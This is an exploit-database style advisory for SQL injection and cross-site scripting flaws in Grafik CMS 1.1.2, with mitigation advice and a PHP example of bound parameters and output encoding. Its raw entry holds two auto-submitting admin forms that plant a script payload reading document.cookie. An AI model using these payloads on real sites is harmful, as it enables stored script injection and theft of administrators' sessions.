Vendor: Grafik CMS
By: N/A
CVSS: HIGH
SQL Injection and Cross-Site Scripting
CWE: 89
Product Name: Grafik CMS
Affected Version From: 1.1.2002
Patch Exists: NO

Grafik CMS SQL Injection and Cross-Site Scripting Vulnerabilities

The Grafik CMS is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities due to inadequate sanitization of user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user-supplied input before using it in SQL queries or outputting it to HTML. Additionally, it is advised to keep the CMS software up to date with the latest patches and versions.
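
One way to apply the mitigation above in PHP, as an added example that is not Grafik CMS code: values are bound as query parameters and HTML-encoded at the point of output. The `pages` table, its columns and the function names are hypothetical, the `page_menu` value is the one used in the proof-of-concept form on this page, and the in-memory SQLite database (assumes the pdo_sqlite extension) is constructed for the demonstration.

```php
<?php
// Added example, not Grafik CMS code. Table, column and function names are hypothetical.
declare(strict_types=1);

// Encode a value for HTML text or a quoted attribute (both quote styles covered).
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Store page fields with bound parameters; the id must be a positive integer.
function save_page(PDO $db, string $id, string $title, string $menu): void
{
    $pageId = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($pageId === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $stmt = $db->prepare('UPDATE pages SET page_title = :t, page_menu = :m WHERE id = :id');
    $stmt->execute([':t' => $title, ':m' => $menu, ':id' => $pageId]);
}

// Constructed in-memory database standing in for the CMS schema.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, page_title TEXT, page_menu TEXT)');
$db->exec("INSERT INTO pages VALUES (1, 'old title', 'old menu')");

// The page_menu value from the proof-of-concept form on this page.
$menu = 'descr"><script>alert(document.cookie)</script>';
save_page($db, '1', 'page title', $menu);

// A constructed non-numeric id is rejected before it reaches the query.
try {
    save_page($db, '1 abc', 'x', 'y');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// The value is stored verbatim and encoded only when written into HTML,
// so the quote and angle brackets can no longer close the attribute or open a tag.
$stored = $db->query('SELECT page_menu FROM pages WHERE id = 1')->fetchColumn();
echo '<a title="', h($stored), '">', h($stored), '</a>', PHP_EOL;
```

Encoding at output rather than at input keeps the stored data intact and lets each output context (HTML body, attribute, JavaScript, URL) apply its own encoder.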

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41227/info

Grafik CMS is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Grafik CMS 1.1.2 is vulnerable; other versions may be affected. 

<form action="http://www.example.com/admin/admin.php?action=edit_page&id=1" method="post" name="main" >
	<input type="hidden" name="page_title" value="page title" />
	<input type="hidden" name="page_menu" value='descr"><script>alert(document.cookie)</script>' />
	<input type="hidden" name="id" value="1" />
	<input type="hidden" name="page_content" value="some page content" />
	<input id="sbmt" type="submit" name="submit" value="Modifier" />
</form>
<script>
document.getElementById('sbmt').click();
</script>


<form action="http://www.example.com/admin/admin.php?action=settings" method="post" name="main" >
	<input type="hidden" name="name" value="site title" />
	<input type="hidden" name="admin_mail" value="example@example.com" />
	<input type="hidden" name="keywords" value="" />
	<input type="hidden" name="description" value='descr"><script>alert(document.cookie)</script>' />
	<input type="hidden" name="site_url" value="http://www.example.com/" />
	<input type="hidden" name="seo_url" value="0" />
	<input type="hidden" name="mailing" value="1" />
	<input type="hidden" name="template" value="templates/default" />
	<input id="sbmt" type="submit" name="submit" value="Valider" />
</form>
<script>
document.getElementById('sbmt').click();
</script>